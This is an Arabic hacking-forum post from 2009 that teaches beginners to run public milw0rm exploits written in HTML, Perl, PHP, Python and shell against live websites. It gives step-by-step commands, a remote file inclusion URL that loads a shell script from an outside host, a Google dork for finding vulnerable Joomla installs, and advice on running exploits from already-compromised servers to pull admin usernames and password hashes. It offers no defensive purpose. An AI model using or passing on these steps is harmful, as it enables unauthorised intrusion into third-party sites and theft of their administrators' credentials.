عرض مشاركة واحدة
قديم 01-27-2009, 12:55 AM   رقم المشاركة : 8 (permalink)
معلومات العضو
AZOZ
.:: شخصيات هامة ـ::.
 
الصورة الرمزية AZOZ
 

 

 
إحصائية العضو






AZOZ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
AZOZ is on a distinguished road

افتراضي


#############################
استثمار التغرات المكتوبة بلغات برمجية ..
#############################
-------------------------------------------------------------------------------------------------------------
في درس الثغرات خذنا استغلال ثغرات عاديه يعني ناخذ الاستغلال والدورك ونطبق . بعض الاحيان نلقى ثغرات يكون استغلالها بلغات برمجيه والاغلب تكون بهاللغات
PHP , Perl , PythOn , Sh,HtmL وإن شاء الله سوف نشرح كل استثمار لكل ثغره بإذن الله
-------------------------------------------------------------------------------------------------------------

استثمار الثغرات المكتوبة بالـ html
الذي تبداً بـ <html>
سوف يكون التطبيق على هده الثغرة
http://www.milw0rm.com/exploits/3818
و هي موجودة في سكريبتthe merchant 2.2.0
ننسخ الاستغلال بالكامل
ونضعه في المفكرة
وعدل كود الشيل الى الشيل حقنا



ونحفظه بامتداد الهتمل
زي كذا
exploit.html
يطلعنلنا شكله
زي كذا



بعدين نحـطه في الـ c
ونتسعـرضه من المتصفـح
C:\exploit.html



وأغلب الثغرآت المكتوبه بهذه اللغـه تكون نوعهآ remote file include
والحين بعلمـكـم طريقـه .. عشآن تطلـع استغلآل لهذه الثغـرهـ
مثلـن الحيـن لقيت موقـع مصـآب .. واستعرضت الشـل ..
ركز مـعـي
نحرر الصفحـه .. بالنوت بأد ..



الاستغلال بيكون كذآ
www.example.com/help/index.php?show=http://www.r3d-crew.com/hook.txt?
/
استثمار الثغرات المكتوبة بالـ Perl
التـي تبدأ
#!/usr/bin/perl
يلـزمـك هذـآ البرنآـمـج مترجم ثغرات البيرل
ActivePerl-5.8.7
حمله من الرابط هذا
http://www.hack-mix.com/tools/ActivePerl-5.8.7.815.rar
بنشرح الثغره على هذآ السكربت EQdkp 1.3.2 وهي من نوع Sql Injection
رابط التغرة
http://www.milw0rm.com/exploits/4030
ننسخ الثغره في مفكره ونحفظهآ بأمتدأد pl
exploit.pl



ونضعه في القـرص سـي C
بعدين نتفـح الدوس
أبدأ > تشغيل > cmd
او من هنآ
C:\WINDOWS\system32\cmd.exe
بعدين نروح لمكآن الثغره في الـ c
cd ..
cd ..
لين يطلع مكأنآ
c:/
بعدين نشغل الثغره بالامر هذا perl
perl exploit.pl
لكي اسهل عليكم شرحتلكم بالصوره



يكون التطبيق على الموقع المصاب كذا
perl exploit.pl http://www.example.com/
وبيطلعلـك .. الادمن .. والباس مشفـر بمقيآس MD5
/
وفيه طريقه ثانيه لاستثمار هذا النوع من الثغره دون تثبيت البرنامج
بـأستخدـأم شل مرفوع على سيرفر لنكس
ترفـع الثغره الى اي مجلد ..
ويكون التطبيق بنفس الاوامر وفي مكان الاوامر ولازم يكون السيف مود اوف حتى تتمكن من تطبيق الاوامر
perl exploit.pl http://www.example.com/
/
استثمار الثغرات المكتوبة بالـPHP
التي تبدأ بـ
#!/usr/bin/php
ويلزمك هذا البرنامج appserv السيرفر الشخصي
حملوه من هذا الرابط
http://prdownloads.sourceforge.net/appserv/appserv-win32-2.5.9.exe?download
رابط الثغره :
http://www.milw0rm.com/exploits/2487
ننسخ الثغره في مفكره ونحفظها بامتداد .php
4images.php



ونضعه في الـ c
ونفـتـح الدوس
ونذهب لـمكآن الثغره
زي ماتعلمـت اول
ونشغل الثغره بهالامر
[IMG]file:///C:/********s%20and%20Settings/mohd/سطح%20المكتب/دورة%20بسيطه%20لاختراق%20المواقع%20والسيرفرات/دروس%20الدورة/images/10.JPG[/IMG]
نحصل على الاستغلال الي هو مقسم لقسمـين
php 4images.php domain.com /4images/ 4images_ 1
php 4images.php domain.com /4images/ -d
بدال كلمة domain.com تحط الموقع المصاب
نحط الاستغلال الاول ثـم الثاني
مع تغيير رابط الموقع المصاب
ويطلعلنا باسورد الادمن مشفر بمقيآس الـ MD5
/
استثمار الثغرات المكتوبة بالـ PythOn
التي تبدأ
#!/usr/bin/python
يلزمك هذآ البرنآمج
PythOn 2.4.3 مترجم ثغرات البايثون
حمله من الرابط هذا
http://www.python.org/ftp/python/2.4.3/python-2.4.3.msi
ننسخ الثغره في مفكره ونحفظه بامتداد .py
exploit.py
ونحطه في الـc
ثمـن نفـتح الدوس
ونذهب لمكان الثغره كما تعودنا في الـ c
ونشغل الثغره بهذي الطريقه
exploit.py
والاسغلال كذا
exploit.pyhttp://domain/path
http://domain/path << نبدله برابط الموقع المصاب مع تحديد مجلد السكربت
/
استثمار الثغرات المكتوبة بلغة الشيل
التي تبدأ
#!/bin/sh او #!/bin/bash ا
يلزمكسرفر لنكس (ShellAccount or Root)
لو كان في حوزتكم شل فلازم اكون يدعم الاتصال العكسي
مثلن هذا الثغره
http://www.milw0rm.com/exploits/4003
كود البحث في قوقل
inurl:index.php?option=com_philaform
تنسخ الثغره في مفكره وتحفظه بامتداد .sh
exploit.sh
ثم ترفعه على الشل ولازم ترفعه على مجلد تصريحه 777
ثم تصرح ملف 777 الثغره بالامر هذا
chmod 777 exploit.sh
ثمـن أمر التشغيل
./exploit.sh
وبالتالي الاستغلال هو :
exploit.sh www.example.com 2
http://www.example.com >> الموقع اللي مركب سكربت Joomla Component Phil-a-Form
2 >> الآي دي id حق الادمن وبتكون 2 افتراضيا

وبيطلعلك اليوزر .. والباس مشفر
التوقيع

مازلت لا أفقهى شي ................

http://www.7ammil.com/data/visitors/...836[1].jpg

Mr.AZOZ
Email:hk-r@live.com

 

   

رد مع اقتباس